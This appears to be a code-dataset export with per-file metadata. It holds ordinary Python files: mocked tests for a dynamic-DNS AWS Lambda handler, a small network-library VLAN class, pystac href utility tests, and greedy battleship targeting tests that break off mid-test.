| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4332b416dfd4818b3a4462eaf2af070fba0f5a87
| 12,133
|
py
|
Python
|
tests/aws/test_functions_dns.py
|
amarkwalder/dynamicdns
|
68dbf80ca90c55a4e9273e6200f04eae90d785da
|
[
"MIT"
] | null | null | null |
tests/aws/test_functions_dns.py
|
amarkwalder/dynamicdns
|
68dbf80ca90c55a4e9273e6200f04eae90d785da
|
[
"MIT"
] | 2
|
2019-10-21T17:00:56.000Z
|
2021-05-07T11:51:55.000Z
|
tests/aws/test_functions_dns.py
|
amarkwalder/dynamicdns
|
68dbf80ca90c55a4e9273e6200f04eae90d785da
|
[
"MIT"
] | null | null | null |
import json
import unittest
from unittest.mock import MagicMock, Mock, patch, mock_open
import dynamicdns
from dynamicdns.aws.functions.dns import handle
from dynamicdns.models import Error
from dynamicdns.aws.route53 import Route53Provider
from dynamicdns.aws.s3config import S3ConfigProvider
from dynamicdns.aws.boto3wrapper import Boto3Wrapper
from dynamicdns.processor import Processor
class TestDNS(unittest.TestCase):
@patch('dynamicdns.processor.factory')
@patch('dynamicdns.aws.s3config.factory')
def testDNSSuccess(self, mock_config, mock_processor):
    """Happy path: handle() reports OK in both JSON and raw response modes."""
    self.__setUpMocks(configFailed=False, hashFailed=False, updateFailed=False,
                      mock_config=mock_config, mock_processor=mock_processor)

    json_event = {
        'queryStringParameters': { 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
        'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
    }
    self.__checkJson(handle(json_event, {}), "SUCCESS", "OK")

    # Same request with the 'raw' flag switches the response format.
    raw_event = {
        'queryStringParameters': { 'raw': '', 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
        'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
    }
    self.__checkRaw(handle(raw_event, {}), "SUCCESS", "OK")
@patch('dynamicdns.processor.factory')
@patch('dynamicdns.aws.s3config.factory')
def testDNSFailConfig(self, mock_config, mock_processor):
    """A failing config load is reported as FAIL in both response modes."""
    self.__setUpMocks(configFailed=True, hashFailed=False, updateFailed=False,
                      mock_config=mock_config, mock_processor=mock_processor)

    json_event = {
        'queryStringParameters': { 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
        'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
    }
    self.__checkJson(handle(json_event, {}), "FAIL", "Config Load failed")

    # Same request with the 'raw' flag switches the response format.
    raw_event = {
        'queryStringParameters': { 'raw': '', 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
        'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
    }
    self.__checkRaw(handle(raw_event, {}), "FAIL", "Config Load failed")
@patch('dynamicdns.processor.factory')
@patch('dynamicdns.aws.s3config.factory')
def testDNSFailHashcheck(self, mock_config, mock_processor):
    """A failing hash check is reported as FAIL in both response modes."""
    self.__setUpMocks(configFailed=False, hashFailed=True, updateFailed=False,
                      mock_config=mock_config, mock_processor=mock_processor)

    json_event = {
        'queryStringParameters': { 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
        'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
    }
    self.__checkJson(handle(json_event, {}), "FAIL", "Hashcheck failed")

    # Same request with the 'raw' flag switches the response format.
    raw_event = {
        'queryStringParameters': { 'raw': '', 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
        'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
    }
    self.__checkRaw(handle(raw_event, {}), "FAIL", "Hashcheck failed")
@patch('dynamicdns.processor.factory')
@patch('dynamicdns.aws.s3config.factory')
def testDNSFailUpdate(self, mock_config, mock_processor):
    """A failing DNS update is reported as FAIL in both response modes."""
    self.__setUpMocks(configFailed=False, hashFailed=False, updateFailed=True,
                      mock_config=mock_config, mock_processor=mock_processor)

    json_event = {
        'queryStringParameters': { 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
        'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
    }
    self.__checkJson(handle(json_event, {}), "FAIL", "Update failed")

    # Same request with the 'raw' flag switches the response format.
    raw_event = {
        'queryStringParameters': { 'raw': '', 'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'},
        'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
    }
    self.__checkRaw(handle(raw_event, {}), "FAIL", "Update failed")
@patch('dynamicdns.processor.factory')
@patch('dynamicdns.aws.s3config.factory')
def testDNSMissingParamInternalIp(self, mock_config, mock_processor):
    """Omitting 'internalip' is allowed: the handler still reports OK."""
    self.__setUpMocks(configFailed=False, hashFailed=False, updateFailed=False,
                      mock_config=mock_config, mock_processor=mock_processor)

    json_event = {
        'queryStringParameters': { 'hostname': 'abc', 'hash': 'xyz'},
        'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
    }
    self.__checkJson(handle(json_event, {}), "SUCCESS", "OK")

    # Same request with the 'raw' flag switches the response format.
    raw_event = {
        'queryStringParameters': { 'raw': '', 'hostname': 'abc', 'hash': 'xyz'},
        'requestContext': { 'identity': { 'sourceIp': '1.1.1.1' } }
    }
    self.__checkRaw(handle(raw_event, {}), "SUCCESS", "OK")
@patch('dynamicdns.processor.factory')
@patch('dynamicdns.aws.s3config.factory')
def testDNSMissingParamHostname(self, mock_config, mock_processor):
    """A request without 'hostname' fails with a parameter-validation message."""
    self.__setUpMocks(configFailed=False, hashFailed=False, updateFailed=False,
                      mock_config=mock_config, mock_processor=mock_processor)
    context = {}
    request_ctx = {'identity': {'sourceIp': '1.1.1.1'}}
    expected_msg = "You have to pass 'hostname' querystring parameters."

    # JSON variant — 'hostname' deliberately absent.
    event = {
        'queryStringParameters': {'hash': 'xyz', 'internalip': '2.2.2.2'},
        'requestContext': request_ctx,
    }
    self.__checkJson(handle(event, context), "FAIL", expected_msg)

    # Raw variant — same missing parameter, plain-text response expected.
    event = {
        'queryStringParameters': {'raw': '', 'hash': 'xyz', 'internalip': '2.2.2.2'},
        'requestContext': request_ctx,
    }
    self.__checkRaw(handle(event, context), "FAIL", expected_msg)
@patch('dynamicdns.processor.factory')
@patch('dynamicdns.aws.s3config.factory')
def testDNSMissingParamHash(self, mock_config, mock_processor):
    """A request without 'hash' fails with a parameter-validation message."""
    self.__setUpMocks(configFailed=False, hashFailed=False, updateFailed=False,
                      mock_config=mock_config, mock_processor=mock_processor)
    context = {}
    request_ctx = {'identity': {'sourceIp': '1.1.1.1'}}
    expected_msg = "You have to pass 'hash' querystring parameters."

    # JSON variant — 'hash' deliberately absent.
    event = {
        'queryStringParameters': {'hostname': 'abc', 'internalip': '2.2.2.2'},
        'requestContext': request_ctx,
    }
    self.__checkJson(handle(event, context), "FAIL", expected_msg)

    # Raw variant — same missing parameter, plain-text response expected.
    event = {
        'queryStringParameters': {'raw': '', 'hostname': 'abc', 'internalip': '2.2.2.2'},
        'requestContext': request_ctx,
    }
    self.__checkRaw(handle(event, context), "FAIL", expected_msg)
@patch('dynamicdns.processor.factory')
@patch('dynamicdns.aws.s3config.factory')
def testDNSMissingParamSourceIp(self, mock_config, mock_processor):
    """Every request-context shape lacking a source IP yields the same FAIL.

    Covers four malformed contexts — key absent, empty dict, None, and an
    identity mapping without 'sourceIp' — each through both the JSON and
    the raw response path.
    """
    self.__setUpMocks(configFailed=False, hashFailed=False, updateFailed=False,
                      mock_config=mock_config, mock_processor=mock_processor)
    context = {}
    params = {'hostname': 'abc', 'hash': 'xyz', 'internalip': '2.2.2.2'}
    message = "Source IP address cannot be extracted from request context."

    _ABSENT = object()  # sentinel: leave 'requestContext' out of the event
    for ctx_value in (_ABSENT, {}, None, {'identity': {}}):
        for raw_mode in (False, True):
            query = dict(params)
            if raw_mode:
                query['raw'] = ''
            event = {'queryStringParameters': query}
            if ctx_value is not _ABSENT:
                event['requestContext'] = ctx_value
            result = handle(event, context)
            if raw_mode:
                self.__checkRaw(result, "FAIL", message)
            else:
                self.__checkJson(result, "FAIL", message)
# -----------------------------------------------------------------------------
# TESTING HELPER METHODS
# -----------------------------------------------------------------------------
def __setUpMocks(self, configFailed: bool, hashFailed: bool, updateFailed: bool, mock_config, mock_processor):
    """Wire the patched config/processor factories to scripted fakes.

    Each boolean flag makes the corresponding stage return an Error(...)
    whose message the tests assert on; when False the stage succeeds.
    `mock_config` / `mock_processor` are the objects injected by the
    `@patch` decorators on the calling test method.
    """
    config = S3ConfigProvider(None)
    # Stub every config accessor the handler may read with a fixed value.
    config.aws_region = MagicMock(return_value = 'aws_region')
    config.route_53_record_ttl = MagicMock(return_value = 'route_53_record_ttl')
    config.route_53_record_type = MagicMock(return_value = 'route_53_record_type')
    config.route_53_zone_id = MagicMock(return_value = 'route_53_zone_id')
    config.shared_secret = MagicMock(return_value = 'shared_secret')
    if configFailed:
        config.load = MagicMock(return_value = Error("Config Load failed"))
    else:
        # On success load() returns the provider itself (fluent style).
        config.load = MagicMock(return_value = config)
    mock_config.return_value = config
    processor = Processor(None)
    if hashFailed:
        processor.checkhash = MagicMock(return_value = Error("Hashcheck failed"))
    else:
        # None signals "hash OK" to the handler.
        processor.checkhash = MagicMock(return_value = None)
    if updateFailed:
        processor.update = MagicMock(return_value = Error("Update failed"))
    else:
        processor.update = MagicMock(return_value = "OK")
    mock_processor.return_value = processor
def __checkJson(self, result, status, message):
    """Assert an HTTP-200 JSON response carrying the given status/message.

    The body is parsed and compared against a dict literal. The previous
    implementation built the expected JSON by string concatenation, which
    produced invalid JSON whenever `message` contained quotes or
    backslashes; direct dict comparison handles any message text.
    """
    self.assertEqual(result['statusCode'], 200)
    self.assertEqual(result['headers']['Content-Type'], 'application/json')
    self.assertEqual(json.loads(result['body']),
                     {'status': status, 'message': message})
def __checkRaw(self, result, status, message):
    """Assert an HTTP-200 plain-text response of the form '<status>\\n<message>'."""
    expected_body = "{0}\n{1}".format(status, message)
    self.assertEqual(200, result['statusCode'])
    self.assertEqual('text/plain', result['headers']['Content-Type'])
    self.assertEqual(expected_body, result['body'])
# Allow executing this test module directly (python <module>.py) in
# addition to discovery via a test runner.
if __name__ == '__main__':
    unittest.main()
| 38.640127
| 139
| 0.591198
| 1,171
| 12,133
| 5.98719
| 0.099061
| 0.017116
| 0.017116
| 0.07531
| 0.818999
| 0.77464
| 0.765226
| 0.765226
| 0.757667
| 0.748253
| 0
| 0.018686
| 0.245776
| 12,133
| 313
| 140
| 38.763578
| 0.747459
| 0.014671
| 0
| 0.60262
| 0
| 0
| 0.285583
| 0.078152
| 0
| 0
| 0
| 0
| 0.026201
| 1
| 0.048035
| false
| 0.017467
| 0.043668
| 0
| 0.09607
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
43399172e57e76fd90727f5f49c9db95a2165a5e
| 114
|
py
|
Python
|
pkgs/ops-pkg/src/genie/libs/ops/vlan/ios/vlan.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | 94
|
2018-04-30T20:29:15.000Z
|
2022-03-29T13:40:31.000Z
|
pkgs/ops-pkg/src/genie/libs/ops/vlan/ios/vlan.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | 67
|
2018-12-06T21:08:09.000Z
|
2022-03-29T18:00:46.000Z
|
pkgs/ops-pkg/src/genie/libs/ops/vlan/ios/vlan.py
|
miott/genielibs
|
6464642cdd67aa2367bdbb12561af4bb060e5e62
|
[
"Apache-2.0"
] | 49
|
2018-06-29T18:59:03.000Z
|
2022-03-10T02:07:59.000Z
|
'''
Vlan Genie Ops Object for IOS - CLI.
'''
from ..iosxe.vlan import Vlan as VlanXE
class Vlan(VlanXE):
    """Vlan Genie Ops object for IOS (CLI).

    Reuses the IOSXE implementation unchanged — the class body is empty
    and everything is inherited from ``..iosxe.vlan.Vlan``.
    """
    pass
| 16.285714
| 39
| 0.675439
| 18
| 114
| 4.277778
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.201754
| 114
| 7
| 40
| 16.285714
| 0.846154
| 0.315789
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
434429d1bf72f145f7668192d9a728391c694267
| 71
|
py
|
Python
|
mra/core/commands/__init__.py
|
Bizarious/mra-bot
|
ff18f42e6957e0ecad21882cb066dcbb2b9b8fcf
|
[
"MIT"
] | null | null | null |
mra/core/commands/__init__.py
|
Bizarious/mra-bot
|
ff18f42e6957e0ecad21882cb066dcbb2b9b8fcf
|
[
"MIT"
] | null | null | null |
mra/core/commands/__init__.py
|
Bizarious/mra-bot
|
ff18f42e6957e0ecad21882cb066dcbb2b9b8fcf
|
[
"MIT"
] | null | null | null |
from .extension import *
from .command import *
from .context import *
| 17.75
| 24
| 0.746479
| 9
| 71
| 5.888889
| 0.555556
| 0.377358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.169014
| 71
| 3
| 25
| 23.666667
| 0.898305
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
4a314995f64ca9d195cd182836ba7984bb39bb56
| 7,983
|
py
|
Python
|
tests/test_utils.py
|
emmanuelmathot/pystac
|
6552327f30658d25972c97024ed71865ed131e52
|
[
"Apache-2.0"
] | null | null | null |
tests/test_utils.py
|
emmanuelmathot/pystac
|
6552327f30658d25972c97024ed71865ed131e52
|
[
"Apache-2.0"
] | null | null | null |
tests/test_utils.py
|
emmanuelmathot/pystac
|
6552327f30658d25972c97024ed71865ed131e52
|
[
"Apache-2.0"
] | null | null | null |
import unittest
import os
import json
import ntpath
from datetime import datetime, timezone, timedelta
from pystac import utils
from pystac.utils import (make_relative_href, make_absolute_href, is_absolute_href)
class UtilsTest(unittest.TestCase):
    """Unit tests for pystac href/datetime/bbox utilities.

    The *_windows variants temporarily swap ``utils._pathlib`` to ``ntpath``
    so POSIX hosts exercise Windows path handling; the try/finally blocks
    restore ``os.path`` so later tests are unaffected.
    """

    def test_make_relative_href(self):
        """make_relative_href relativizes local and http(s) hrefs."""
        # Test cases of (source_href, start_href, expected)
        test_cases = [
            ('/a/b/c/d/catalog.json', '/a/b/c/catalog.json', './d/catalog.json'),
            ('/a/b/catalog.json', '/a/b/c/catalog.json', '../catalog.json'),
            ('/a/catalog.json', '/a/b/c/catalog.json', '../../catalog.json'),
            ('http://stacspec.org/a/b/c/d/catalog.json', 'http://stacspec.org/a/b/c/catalog.json',
             './d/catalog.json'),
            ('http://stacspec.org/a/b/catalog.json', 'http://stacspec.org/a/b/c/catalog.json',
             '../catalog.json'),
            ('http://stacspec.org/a/catalog.json', 'http://stacspec.org/a/b/c/catalog.json',
             '../../catalog.json'),
            # Different host: href is returned absolute, unchanged.
            ('http://stacspec.org/a/catalog.json', 'http://cogeo.org/a/b/c/catalog.json',
             'http://stacspec.org/a/catalog.json'),
            # Different scheme: also returned absolute, unchanged.
            ('http://stacspec.org/a/catalog.json', 'https://stacspec.org/a/b/c/catalog.json',
             'http://stacspec.org/a/catalog.json')
        ]
        for source_href, start_href, expected in test_cases:
            actual = make_relative_href(source_href, start_href)
            self.assertEqual(actual, expected)

    def test_make_relative_href_windows(self):
        """Windows path flavor: backslash separators and drive letters."""
        utils._pathlib = ntpath
        try:
            # Test cases of (source_href, start_href, expected)
            test_cases = [
                ('C:\\a\\b\\c\\d\\catalog.json', 'C:\\a\\b\\c\\catalog.json', '.\\d\\catalog.json'),
                ('C:\\a\\b\\catalog.json', 'C:\\a\\b\\c\\catalog.json', '..\\catalog.json'),
                ('C:\\a\\catalog.json', 'C:\\a\\b\\c\\catalog.json', '..\\..\\catalog.json'),
                ('a\\b\\c\\catalog.json', 'a\\b\\catalog.json', '.\\c\\catalog.json'),
                ('a\\b\\catalog.json', 'a\\b\\c\\catalog.json', '..\\catalog.json'),
                # URLs keep forward slashes even in Windows mode.
                ('http://stacspec.org/a/b/c/d/catalog.json',
                 'http://stacspec.org/a/b/c/catalog.json', './d/catalog.json'),
                ('http://stacspec.org/a/b/catalog.json', 'http://stacspec.org/a/b/c/catalog.json',
                 '../catalog.json'),
                ('http://stacspec.org/a/catalog.json', 'http://stacspec.org/a/b/c/catalog.json',
                 '../../catalog.json'),
                ('http://stacspec.org/a/catalog.json', 'http://cogeo.org/a/b/c/catalog.json',
                 'http://stacspec.org/a/catalog.json'),
                ('http://stacspec.org/a/catalog.json', 'https://stacspec.org/a/b/c/catalog.json',
                 'http://stacspec.org/a/catalog.json')
            ]
            for source_href, start_href, expected in test_cases:
                actual = make_relative_href(source_href, start_href)
                self.assertEqual(actual, expected)
        finally:
            # Restore the real path module for subsequent tests.
            utils._pathlib = os.path

    def test_make_absolute_href(self):
        """make_absolute_href resolves relative hrefs against a start href."""
        # Test cases of (source_href, start_href, expected)
        test_cases = [('item.json', '/a/b/c/catalog.json', '/a/b/c/item.json'),
                      ('./item.json', '/a/b/c/catalog.json', '/a/b/c/item.json'),
                      ('./z/item.json', '/a/b/c/catalog.json', '/a/b/c/z/item.json'),
                      ('../item.json', '/a/b/c/catalog.json', '/a/b/item.json'),
                      ('item.json', 'https://stacspec.org/a/b/c/catalog.json',
                       'https://stacspec.org/a/b/c/item.json'),
                      ('./item.json', 'https://stacspec.org/a/b/c/catalog.json',
                       'https://stacspec.org/a/b/c/item.json'),
                      ('./z/item.json', 'https://stacspec.org/a/b/c/catalog.json',
                       'https://stacspec.org/a/b/c/z/item.json'),
                      ('../item.json', 'https://stacspec.org/a/b/c/catalog.json',
                       'https://stacspec.org/a/b/item.json')]
        for source_href, start_href, expected in test_cases:
            actual = make_absolute_href(source_href, start_href)
            self.assertEqual(actual, expected)

    def test_make_absolute_href_on_vsitar(self):
        """GDAL /vsitar// virtual paths (double slash) must survive resolution."""
        rel_path = 'some/item.json'
        cat_path = '/vsitar//tmp/catalog.tar/catalog.json'
        expected = '/vsitar//tmp/catalog.tar/some/item.json'
        self.assertEqual(expected, make_absolute_href(rel_path, cat_path))

    def test_make_absolute_href_windows(self):
        """Windows flavor of make_absolute_href; drive letters come back lowercased."""
        utils._pathlib = ntpath
        try:
            # Test cases of (source_href, start_href, expected)
            test_cases = [('item.json', 'C:\\a\\b\\c\\catalog.json', 'c:\\a\\b\\c\\item.json'),
                          ('.\\item.json', 'C:\\a\\b\\c\\catalog.json', 'c:\\a\\b\\c\\item.json'),
                          ('.\\z\\item.json', 'Z:\\a\\b\\c\\catalog.json',
                           'z:\\a\\b\\c\\z\\item.json'),
                          ('..\\item.json', 'a:\\a\\b\\c\\catalog.json', 'a:\\a\\b\\item.json'),
                          # Scheme is case-insensitive: HTTPS normalizes to https.
                          ('item.json', 'HTTPS://stacspec.org/a/b/c/catalog.json',
                           'https://stacspec.org/a/b/c/item.json'),
                          ('./item.json', 'https://stacspec.org/a/b/c/catalog.json',
                           'https://stacspec.org/a/b/c/item.json'),
                          ('./z/item.json', 'https://stacspec.org/a/b/c/catalog.json',
                           'https://stacspec.org/a/b/c/z/item.json'),
                          ('../item.json', 'https://stacspec.org/a/b/c/catalog.json',
                           'https://stacspec.org/a/b/item.json')]
            for source_href, start_href, expected in test_cases:
                actual = make_absolute_href(source_href, start_href)
                self.assertEqual(actual, expected)
        finally:
            # Restore the real path module for subsequent tests.
            utils._pathlib = os.path

    def test_is_absolute_href(self):
        """Rooted paths and URLs are absolute; dotted/bare names are not."""
        # Test cases of (href, expected)
        test_cases = [('item.json', False), ('./item.json', False), ('../item.json', False),
                      ('/item.json', True), ('http://stacspec.org/item.json', True)]
        for href, expected in test_cases:
            actual = is_absolute_href(href)
            self.assertEqual(actual, expected)

    def test_is_absolute_href_windows(self):
        """Windows flavor: drive-letter paths are absolute."""
        utils._pathlib = ntpath
        try:
            # Test cases of (href, expected)
            test_cases = [('item.json', False), ('.\\item.json', False), ('..\\item.json', False),
                          ('c:\\item.json', True), ('http://stacspec.org/item.json', True)]
            for href, expected in test_cases:
                actual = is_absolute_href(href)
                self.assertEqual(actual, expected)
        finally:
            # Restore the real path module for subsequent tests.
            utils._pathlib = os.path

    def test_datetime_to_str(self):
        """Naive datetimes are treated as UTC; aware ones keep their offset."""
        cases = (
            ('timezone naive, assume utc', datetime(2000, 1, 1), '2000-01-01T00:00:00Z'),
            ('timezone aware, utc', datetime(2000, 1, 1,
                                             tzinfo=timezone.utc), '2000-01-01T00:00:00Z'),
            ('timezone aware, utc -7', datetime(2000, 1, 1, tzinfo=timezone(timedelta(hours=-7))),
             '2000-01-01T00:00:00-07:00'),
        )
        for title, dt, expected in cases:
            with self.subTest(title=title):
                got = utils.datetime_to_str(dt)
                self.assertEqual(expected, got)

    def test_geojson_bbox(self):
        """geometry_to_bbox returns a non-None bbox for every sample geometry."""
        # Use sample Geojson from https://en.wikipedia.org/wiki/GeoJSON
        with open('tests/data-files/geojson/sample.geojson') as sample_geojson:
            all_features = json.load(sample_geojson)
            geom_dicts = [f['geometry'] for f in all_features['features']]
            for geom in geom_dicts:
                got = utils.geometry_to_bbox(geom)
                self.assertNotEqual(got, None)
| 50.525316
| 100
| 0.534761
| 1,015
| 7,983
| 4.100493
| 0.097537
| 0.18765
| 0.03604
| 0.081691
| 0.80394
| 0.78568
| 0.755646
| 0.748438
| 0.71384
| 0.708554
| 0
| 0.011462
| 0.278717
| 7,983
| 157
| 101
| 50.847134
| 0.711358
| 0.040461
| 0
| 0.48062
| 0
| 0
| 0.388265
| 0.070047
| 0
| 0
| 0
| 0
| 0.069767
| 1
| 0.069767
| false
| 0
| 0.054264
| 0
| 0.131783
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4a808a7a3af1474e8e5145718aba73c37903468a
| 9,286
|
py
|
Python
|
TP3/1. Battleship/Tests/GreedoTest.py
|
FdelMazo/TDA1
|
a61dc6abe0a30b129c3b0f8b2df6f74331e08dc7
|
[
"MIT"
] | 2
|
2020-10-10T17:34:16.000Z
|
2021-11-20T18:40:16.000Z
|
TP3/1. Battleship/Tests/GreedoTest.py
|
FdelMazo/7529rw-TDA
|
a61dc6abe0a30b129c3b0f8b2df6f74331e08dc7
|
[
"MIT"
] | null | null | null |
TP3/1. Battleship/Tests/GreedoTest.py
|
FdelMazo/7529rw-TDA
|
a61dc6abe0a30b129c3b0f8b2df6f74331e08dc7
|
[
"MIT"
] | null | null | null |
import unittest
from Greedo import Greedo
from GreedoNaive import GreedoNaive
from Partida import Partida
from Barco import Barco
class TestUnaLanzaderaGreedoSmart(unittest.TestCase):
    """Greedy target selection with a single launcher (una lanzadera).

    NOTE(review): `matriz` rows appear to be per-ship damage options and
    `Partida(matriz, barcos, n, greedo)` a game with n launchers — confirm
    against the Partida implementation.
    """

    def testUnaLanzaderaUnBarcoUnicaOpcionPosibleDerribarlo(self):
        """One ship, one launcher: the only shot available sinks it."""
        greedobruto = Greedo()
        barco = Barco(100)
        barco.setPosicion(0, 0)
        matriz = [[100, 40, 30, 10]]
        partida = Partida(matriz, [barco], 1, greedobruto)
        targets = greedobruto.elegirTargetsDeLaPartida(partida)
        partida.setTargetDelTurno(targets[0])
        partida.jugarTurno()
        self.assertTrue(barco.estaDerribado())

    def testUnaLanzaderaUnBarcoUnicaOpcionPosibleNoDerribarlo(self):
        """One ship, one launcher: the only shot is too weak to sink it."""
        greedobruto = Greedo()
        barco = Barco(100)
        barco.setPosicion(0, 0)
        matriz = [[10, 40, 30, 10]]
        partida = Partida(matriz, [barco], 1, greedobruto)
        targets = greedobruto.elegirTargetsDeLaPartida(partida)
        partida.setTargetDelTurno(targets[0])
        partida.jugarTurno()
        self.assertFalse(barco.estaDerribado())

    def testUnaLanzaderaDosBarcosSacaLaMayorCantidadPosible(self):
        """Two ships: greedy deals the largest possible damage (A ends lower)."""
        greedobruto = Greedo()
        A = Barco(100)
        B = Barco(100)
        A.setPosicion(0, 0)
        B.setPosicion(0, 1)
        matriz = [[80, 40, 30, 10], [50, 30, 80, 100]]
        partida = Partida(matriz, [A, B], 1, greedobruto)
        targets = greedobruto.elegirTargetsDeLaPartida(partida)
        partida.setTargetDelTurno(targets[0])
        partida.jugarTurno()
        self.assertFalse(A.estaDerribado())
        self.assertFalse(B.estaDerribado())
        self.assertTrue(A.getVida() < B.getVida())

    def testUnaLanzaderaDosBarcosDerribaAlQuePuede(self):
        """Two ships, only A can be sunk this turn: greedy sinks A."""
        greedobruto = Greedo()
        A = Barco(100)
        B = Barco(100)
        A.setPosicion(0, 0)
        B.setPosicion(0, 1)
        matriz = [[100, 40, 30, 10], [50, 30, 80, 100]]
        partida = Partida(matriz, [A, B], 1, greedobruto)
        targets = greedobruto.elegirTargetsDeLaPartida(partida)
        partida.setTargetDelTurno(targets[0])
        partida.jugarTurno()
        self.assertTrue(A.estaDerribado())
        self.assertFalse(B.estaDerribado())

    def testUnaLanzaderaDosBarcosDerribaAlQuePuedeInvertido(self):
        """Mirror of the previous case: only B is sinkable, greedy sinks B."""
        greedobruto = Greedo()
        A = Barco(100)
        B = Barco(100)
        A.setPosicion(0, 0)
        B.setPosicion(0, 1)
        matriz = [[50, 40, 30, 10], [100, 30, 80, 100]]
        partida = Partida(matriz, [A, B], 1, greedobruto)
        targets = greedobruto.elegirTargetsDeLaPartida(partida)
        partida.setTargetDelTurno(targets[0])
        partida.jugarTurno()
        self.assertFalse(A.estaDerribado())
        self.assertTrue(B.estaDerribado())

    def testUnaLanzaderaDosBarcosDerribaIgualesDerribaAlPrimero(self):
        """Tie between equally sinkable ships: greedy takes the first one."""
        greedobruto = Greedo()
        A = Barco(100)
        B = Barco(100)
        A.setPosicion(0, 0)
        B.setPosicion(0, 1)
        matriz = [[100, 40, 30, 10], [100, 30, 80, 100]]
        partida = Partida(matriz, [A, B], 1, greedobruto)
        targets = greedobruto.elegirTargetsDeLaPartida(partida)
        partida.setTargetDelTurno(targets[0])
        partida.jugarTurno()
        self.assertTrue(A.estaDerribado())
        self.assertFalse(B.estaDerribado())
class TestDosLanzaderasGreedoSmart(unittest.TestCase):
    """Two-launcher scenarios; a None entry in a target list appears to mean
    'launcher idles' (no shot at an already-dead ship) — confirm with Greedo."""

    def testDosLanzaderasUnBarcoNoSeDisparaABarcoYaMuerto(self):
        """One ship killable by the first launcher: the second holds fire."""
        greedo = GreedoNaive()
        barco = Barco(100)
        barco.setPosicion(0, 0)
        matriz = [[100]]
        partida = Partida(matriz, [barco], 2, greedo)
        targets = greedo.elegirTargetsDeLaPartida(partida)
        self.assertEqual(targets[0], [0, None])

    def testDosLanzaderasDosBarcosSeMataAUNoSeDaniaAlOtro(self):
        """First launcher kills A, second targets B instead of overkilling A."""
        greedo = GreedoNaive()
        A = Barco(100)
        B = Barco(100)
        A.setPosicion(0, 0)
        B.setPosicion(0, 1)
        matriz = [[100], [50]]
        partida = Partida(matriz, [A, B], 2, greedo)
        targets = greedo.elegirTargetsDeLaPartida(partida)
        self.assertEqual(targets[0], [0, 1])
class TestTresLanzaderasGreedoSmart(unittest.TestCase):
    """Three-launcher scenarios for the greedy (Greedo) strategy."""

    def testTresLanzaderasUnBarcoDerribado(self):
        """Three launchers accumulate enough damage to sink the single ship."""
        greedobruto = Greedo()
        barco = Barco(100)
        barco.setPosicion(0, 0)
        matriz = [[50, 40, 30, 10]]
        partida = Partida(matriz, [barco], 3, greedobruto)
        targets = greedobruto.elegirTargetsDeLaPartida(partida)
        partida.setTargetDelTurno(targets[0])
        partida.jugarTurno()
        self.assertTrue(barco.estaDerribado())

    def testTresLanzaderasUnBarcoNoDerribado(self):
        """Damage options are too weak: the ship survives the turn."""
        greedobruto = Greedo()
        barco = Barco(100)
        barco.setPosicion(0, 0)
        matriz = [[10, 40, 30, 10]]
        partida = Partida(matriz, [barco], 3, greedobruto)
        targets = greedobruto.elegirTargetsDeLaPartida(partida)
        partida.setTargetDelTurno(targets[0])
        partida.jugarTurno()
        self.assertFalse(barco.estaDerribado())

    def testTresLanzaderasDosBarcoUnoDerribado(self):
        """Only A can be finished off with three launchers; B survives."""
        greedobruto = Greedo()
        A = Barco(100)
        B = Barco(100)
        A.setPosicion(0, 0)
        B.setPosicion(0, 1)
        matriz = [[50, 40, 30, 10], [40, 30, 80, 100]]
